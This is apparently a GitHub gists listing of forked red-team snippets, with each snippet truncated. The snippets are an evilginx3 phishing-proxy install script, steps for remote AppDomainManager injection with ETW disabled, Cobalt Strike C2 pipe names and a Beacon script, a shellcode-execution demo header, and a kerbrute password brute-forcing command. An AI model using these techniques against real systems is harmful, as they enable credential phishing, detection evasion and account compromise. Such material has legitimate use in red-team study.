@bridge-four
bridge-four / install_evilginx3.sh
Created August 14, 2023 21:16 — forked from dunderhay/install_evilginx3.sh
bash script to install evilginx3 on a ubuntu linux host
#!/bin/bash
set -e
GO_VERSION="1.20.6"
GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
EXPECTED_CHECKSUM="b945ae2bb5db01a0fb4786afde64e6fbab50b67f6fa0eb6cfa4924f16a7ff1eb"
# Log output of script
exec > >(tee -i /home/ubuntu/install.log)
exec 2>&1
@bridge-four
bridge-four / README.md
Created May 10, 2021 04:01 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to, say, C:\Test. Let's use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name; this is required to load an assembly outside of a .NET application's base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server
@bridge-four
bridge-four / Named Pipes.txt
Last active May 4, 2021 23:28 — forked from MHaggis/malleable_c2_profiles
Malleable C2 / Spawnto / Pipes
bing.profile:68:set pipename "win_svc";
bing.profile:69:set pipename_stager "win_svc";
clean_template.profile:24:set pipename "ntsvcs##";
clean_template.profile:25:set pipename_stager "scerpc##";
clean_template.profile:34:set ssh_pipename "SearchTextHarvester##";
clean_template.profile:363: set pipename "DserNamePipe##";
cobalt.profile:139:## pipename: msagent_##
cobalt.profile:140:## pipename_stager: status_##
cobalt.profile:142:## - Do not use an existing namedpipe, Beacon doesn't check for conflict!
cobalt.profile:145:#set pipename "wkssvc_##";
@bridge-four
bridge-four / forkstats.py
Created September 6, 2020 03:11 — forked from elemongw/forkstats.py
Find most active forks of a project in GitHub. Sorts by most recently pushed
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Collect all forks of a github project and return the most recently pushed.
Any alternatives I could find searched only the most recent forks of a project,
which does not return accurate results for projects with many forks.
Note that the GitHub API has a rate limit of 60 requests per hour for unauthenticated requests.
You can create a personal access token in order to circumvent this, which will raise the limit
@bridge-four
bridge-four / search.cna
Created August 14, 2020 18:48 — forked from rsmudge/search.cna
Search scrollback for a Beacon (even the stuff that's cut off)
# search for and reproduce output that matches a specific regex.
alias search {
local('$regex $regex2 $entry $event $bid $out $when');
# take all of the args, without processing/parsing as normal.
if (strlen($0) > 7) {
$regex = substr($0, 7);
}
else {
berror($1, "search [regex]");
@bridge-four
bridge-four / EtwpTest.cs
Created May 7, 2020 14:17 — forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
class Program
{
static void Main(string[] args)
{

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: